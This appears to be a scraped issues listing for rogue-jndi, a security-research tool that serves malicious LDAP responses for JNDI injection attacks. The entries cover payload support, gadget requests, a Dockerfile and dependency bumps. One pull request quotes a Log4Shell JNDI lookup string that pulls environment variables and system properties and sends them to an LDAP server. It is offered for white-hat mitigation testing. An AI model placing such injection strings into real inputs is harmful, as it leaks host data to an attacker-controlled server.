rogue-jndi icon indicating copy to clipboard operation
rogue-jndi copied to clipboard

Published 20 hours ago verified publisher icon veracode-research

Metadata

A malicious LDAP server for JNDI injection attacks

Results 11 rogue-jndi issues
Sort by recently updated
recently updated
newest added

Add support for FromFile payload

Adds support for using pre-generated payloads (e.g. ysoserial) directly from a file.

putsi avatar putsi

a spelling mistake in artsploit.HttpServer

1 comment

In ```case "/upload.wsdl"```, it should be ```xExportObject.jar``` **NOT** ```xExploitObject.jar``` in the xml which takes me hours to finally figure it out. Anywary, great work!

feihong-cs avatar feihong-cs

Fixed #6 in upstream

1 comment

wh1tenoise avatar wh1tenoise

Log request and base DN to validate Log4Shell information leakage attack vector

### Motivation For testing Log4Shell information leakage attack vector with inputs such as `${jndi:ldap://127.0.1.1:1389/user=${env:USER},vendor=${sys:java.vendor},javaversion=${sys:java.vm.version},os=${sys:os.version}}` Suitable for usage with [log4shell-mitigation-tester](https://github.com/lhotari/log4shell-mitigation-tester/blob/master/README.md#exploiting-with-rogue-jndi). Strictly meant for white hat purposes and for understanding Log4Shell. ###...

lhotari avatar lhotari

jdk版本

我使用dnslog是可以正常请求到包。但是我本地mvn3.6.1和jdk11.0.13使用了相同的方法但是无法成功,jdk高版本会导致这个问题吗?

Mayter avatar Mayter

Pull Request To Add Jetty Gadget

2 comment

Hello Veracode Reasearch, Please I don't know if you could add a gadget for jetty eclipse based systems ? Kind Regards, @abrahack .

abrahack avatar abrahack

Write Dockerfile

Hey. Wrote a simple Dockefile which might ease building and deploying rogue-jndi.

goncalor avatar goncalor

Bump org.apache.tomcat.embed:tomcat-embed-core from 8.5.61 to 8.5.93

Bumps org.apache.tomcat.embed:tomcat-embed-core from 8.5.61 to 8.5.93. [![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=org.apache.tomcat.embed:tomcat-embed-core&package-manager=maven&previous-version=8.5.61&new-version=8.5.93)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a...

dependabot[bot] avatar dependabot[bot]

dependencies

Bump com.unboundid:unboundid-ldapsdk from 3.1.1 to 4.0.5

Bumps [com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) from 3.1.1 to 4.0.5. Release notes Sourced from com.unboundid:unboundid-ldapsdk's releases. UnboundID LDAP SDK for Java 4.0.5 We have just released the UnboundID LDAP SDK for Java version 4.0.5,...

dependabot[bot] avatar dependabot[bot]

dependencies

Bump org.apache.commons:commons-text from 1.8 to 1.10.0

Bumps org.apache.commons:commons-text from 1.8 to 1.10.0. [![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=org.apache.commons:commons-text&package-manager=maven&previous-version=1.8&new-version=1.10.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a...

dependabot[bot] avatar dependabot[bot]

dependencies

Metadata

840
Stars
200
Forks
Watchers

Owner

verified publisher icon veracode-research

Metadata

A malicious LDAP server for JNDI injection attacks

Back